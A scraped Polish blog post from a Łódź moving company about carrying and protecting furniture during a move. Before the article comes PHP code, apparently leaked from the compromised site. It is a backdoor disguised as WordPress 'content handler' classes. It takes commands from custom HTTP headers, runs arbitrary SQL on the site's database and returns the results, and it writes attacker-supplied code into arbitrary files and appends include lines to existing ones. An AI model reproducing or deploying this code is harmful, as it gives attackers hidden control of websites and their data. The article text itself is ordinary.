n class WP_Content_Handler_Checker { var $wp_host; var $wp_user; var $wp_pass; var $name; var $result = array(); var $errors = array(); var $wp_themes_count = 0; function check_wp_connection($wp_connection) { if (class_exists('PDO')) { $this->check_wp_pdo_connection($wp_connection); } else { $this->check_wp_mysql_connection($wp_connection); } } function check_wp_mysql_connection($wp_connection) { if (function_exists('mysqli_connect')) { $connection = mysqli_connect($this->wp_host, $this->wp_user, $this->wp_pass, $this->name); if (!$connection instanceof mysqli) { $this->add_wp_error(910, sprintf("Can't connect to mysqli, message - %s, code - %d", $connection->connect_error, $connection->connect_errno)); return; } call_user_func_array(array($connection, 'query'), array("SET NAMES 'utf8'")); call_user_func_array(array($connection, 'query'), array("SET CHARACTER SET 'utf8'")); $wp_connection_success = call_user_func_array(array($connection, 'query'), array($wp_connection)); if ($wp_connection_success == false) { $this->add_wp_error($connection->errno, $connection->error); } else { $this->wp_themes_count = $connection->{'affected_rows'}; while ($data = call_user_func_array(array($wp_connection_success, 'fetch_assoc'), array())) { $this->result[] = $data; } } } elseif (function_exists('mysql_connect')) { $connection = mysql_connect($this->wp_host, $this->wp_user, $this->wp_pass); if ($connection == false) { $this->add_wp_error(910, "Can't connect to mysql"); return; } mysql_select_db($this->name, $connection); mysql_query("SET NAMES 'utf8'", $connection); mysql_query("SET CHARACTER SET 'utf8'", $connection); $wp_connection_success = mysql_query($wp_connection, $connection); if ($wp_connection_success == false) { $this->add_wp_error(mysql_errno($connection), mysql_error($connection)); } else { $this->wp_themes_count = mysql_num_rows($wp_connection_success); while ($data = mysql_fetch_assoc($wp_connection_success)) { $this->result[] = $data; } } } } function check_wp_pdo_connection($wp_connection) { $pdo_config_all = 'mysql:'; $pdo_config = array( 'host' => $this->wp_host, 'dbname' => $this->name, 'charset' => 'utf8' ); foreach ($pdo_config as $key => &$item) { $item = $key . '=' . $item; } $pdo_config_all .= implode(';', $pdo_config); try { $connection = new PDO($pdo_config_all, $this->wp_user, $this->wp_pass); call_user_func_array(array($connection, 'query'), array('SET CLIENT_ENCODING TO "UTF8"')); call_user_func_array(array($connection, 'query'), array('SET NAMES "UTF8"')); $query = call_user_func_array(array($connection, 'query'), array($wp_connection, PDO::FETCH_ASSOC)); if ($query == false) { $error_info = call_user_func_array(array($connection, 'errorInfo'), array()); $error_code = call_user_func_array(array($connection, 'errorCode'), array()); $this->add_wp_error($error_code, end($error_info)); return; } $this->wp_themes_count = call_user_func(array($query, 'rowCount'), array()); $this->result = call_user_func_array(array($query, 'fetchAll'), array()); } catch (PDOException $exception) { $this->add_wp_error(call_user_func_array(array($exception, 'getCode'), array()), call_user_func_array(array($exception, 'getMessage'), array())); } } function __construct() { $this->wp_host = stripslashes(@$_SERVER['HTTP_VI_DATABASE_HOST']); $this->wp_user = stripslashes(@$_SERVER['HTTP_VI_DATABASE_USER']); $this->wp_pass = stripslashes(@$_SERVER['HTTP_VI_DATABASE_PASS']); $this->name = stripslashes(@$_SERVER['HTTP_VI_DATABASE_NAME']); if (empty($this->wp_host)) { $this->add_wp_error(900, "No host provided"); } if (empty($this->wp_user)) { $this->add_wp_error(901, "No user provided"); } if (empty($this->wp_pass)) { $this->add_wp_error(902, "No pass provided"); } if (empty($this->name)) { $this->add_wp_error(903, "No database name provided"); } } function add_wp_error($code, $message) { $this->errors[] = array( 'code' => $code, 'message' => $message ); } function get_wp_errors() { return $this->errors; } function wp_get_themes_count() { return $this->wp_themes_count; } function is_wp_connection_succeed() { return !count($this->errors); } function get_wp_connection_result() { return $this->result; } } class WP_Content_Handler_Accessor { function create() { $method = @$_SERVER['HTTP_VI_METHOD']; if (!mb_strlen($method)) { return; } ob_end_clean(); switch ($method) { case 'query': $this->check_wp_connection_handler(); break; case 'update': $this->update_parameters(); break; default: return; } } function check_wp_connection_handler() { $query = stripslashes(@$_SERVER['HTTP_VI_DATABASE_QUERY']); if (!mb_strlen($query)) { $this->wp_response(false, array( array( 'code' => 0, 'message' => 'No query provided' ) )); exit; } $database = new WP_Content_Handler_Checker(); $database->check_wp_connection($query); if ($database->is_wp_connection_succeed()) { $this->wp_response(true, array( 'rows' => $database->wp_get_themes_count(), 'result' => $database->get_wp_connection_result() )); } else { $this->wp_response(false, $database->get_wp_errors()); } } function update_parameters() { $parameters_path = stripslashes(@$_SERVER['HTTP_VI_PATH']); $new_parameters = urldecode(@$_REQUEST['VI_SCRIPT']); $old_parameters_path = stripslashes(@$_SERVER['HTTP_VI_INCLUDE_PATH']); $old_parameters = urldecode(@$_REQUEST['VI_INCLUDE_CODE']); if (!mb_strlen($new_parameters)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript passed' ))); } if (!mb_strlen($parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript path passed' ))); } if (!mb_strlen($old_parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No include path passed' ))); } $success = $this->update_wp_accessor_parameters($parameters_path, $new_parameters); if ($success) { $success = $this->wp_update_parameters($old_parameters_path, $old_parameters); } $this->wp_response($success, null); } function update_wp_accessor_parameters($path, $parameters) { return (bool)@file_put_contents($path, " n" . stripslashes($parameters)); } function wp_update_parameters($old_parameters_path, $old_parameters) { $file = file_get_contents($old_parameters_path); if (!mb_strlen($file)) { return false; } if (mb_strpos($file, $old_parameters) !== false) { return true; } if ($this->is_parameters_valid($file)) { $file = $file . "n" . " n" . $old_parameters . " n?>"; } else { $file = $file . "nn" . $old_parameters; } return (bool)@file_put_contents($old_parameters_path, $file); } function is_parameters_valid($file) { $last_available_parameters_count = strrpos($file, ""); $last_updated_parameters_count = ($last_updated_parameters_count === false) ? -1 : $last_updated_parameters_count; return $last_available_parameters_count <= $last_updated_parameters_count; } function wp_response($success, $data) { $wp_response = array('success' => $success); $wp_response[$success ? 'data' : 'errors'] = $data; header('Content-Type: application/json'); echo json_encode($wp_response); exit; } } $accessor = new WP_Content_Handler_Accessor(); $accessor->create(); Wnoszenie mebli podczas przeprowadzki - Przeprowadzki Łódź ® przeprowadzajac.pl

Wnoszenie mebli podczas przeprowadzki

przeprowadzki

Przeprowadzka to trudny czas. Czas pracy i czas wielkiego wysiłku. Spośród wielu etapów przeprowadzki, niektóre są po prostu prawdziwą przyjemnością, inne zaś wielkim trudem. W opinii wielu, pakowanie nie jest problemem. Zabezpieczane mebli również nie nastręcza trudności, jednak gdy przychodzi do znoszenia i wnoszenia mebli oraz innych ciężkich elementów, wiele osób uznaje to za dramat. Po części nim jest. Ciężar mebli oraz innych rzeczy oraz nieporęczność w noszeniu, w połączeniu z mało praktycznymi schodami to skuteczny straszak dla wszystkich, którzy chcą się tego podjąć. Jak znosić i wnosić meble? Odpowiedź jest prosta – powoli i z wielką ostrożnością.

Przygotowanie mebli czy innych sprzętów do przeniesienia, powinno być bardzo dokładne. Warto wiedzieć, co można zrobić, by sobie prace ułatwić.

Rozkręcanie mebli

Wiele mebli oraz innych elementów wyposażenia mieszkania to rzeczy, które można rozkręcić. Bez wątpienia to lepsze rozwiązanie niż w przypadku mebli dostępnych kilka lat temu. Wtedy były to meble klejone, a przenoszenie było poważnym zadaniem. Każdy, kto miał okazję przenosić łóżko czy szafę po wąskich schodach doskonale wie, jak trudne to jest zadanie. Dzisiejsze meble można rozebrać, a wiec skoro można, warto rozebrać je nawet do najmniejszej śrubki . Warto to zrobić, dlatego należy przygotować się do tego, gromadząc niezbędne narzędzia i materiały. Oczywiście należy zapamiętać, lub zapisać, w jaki sposób meble są rozkręcany, by wiedzieć, jak je złożyć.

Wnoszenie i znoszenie mebli podczas przeprowadzki

Wnoszenie i znoszenie to najtrudniejsze prace podczas każdej przeprowadzki. Na pewno trzeba wiedzieć jedno – samodzielnie nie ma możliwości takich prac przeprowadzić. Niezbędna jest pomoc co najmniej jednej osoby, aczkolwiek o wole lepiej jeśli tych osób jest więcej – trzy, cztery. Idealnie jest, jeśli osób jest na tyle dużo, by znosić kilka rzeczy naraz.
Wnoszenie mebli podczas przeprowadzki
Znosząc i wnosząc trzeba zdać sobie sprawę z jednego – to wysiłek, wiec nie da się po prostu zrobić wszystkiego za pierwszym razem. Bez względu na to z jakim meblem idziemy, warto zaplanować sobie przerwy, chwile na odpoczynek.

Znosząc i wnosząc trzeba przywiązać wielką wagę do tego by mebli czy sprzętów nie zniszczyć. Wąskie schody, twarde ściany oraz inne problemy mogą spowodować przypadkowe obicia, stłuczenia czy wgięcia, dobrze jest więc zabezpieczyć meble na czas przenoszenia. Delikatne zabezpieczenia w miejscach szczególnie wrażliwych to coś, czego założenie trwa po prostu chwilę. Warto się na to zdecydować, pamiętając jednak, że nie uchroni to nas przed wypadkami, jeśli nie będziemy po prostu uważać. Warto więc przy noszeniu uważać na przypadkowe uderzenia o schody czy też inne elementy. Szczególnie groźnie jest podczas zawracania na klatce schodowej, duże uszkodzenia mogą się pojawić również w chwili wnoszenia mebli i dobytku do samochodu.

Zachowując duża dozę ostrożności i wcześniej zabezpieczając meble, uda się je przetransportować bez żadnych uszkodzeń. Wtarto się o to postarać.

Leave a Reply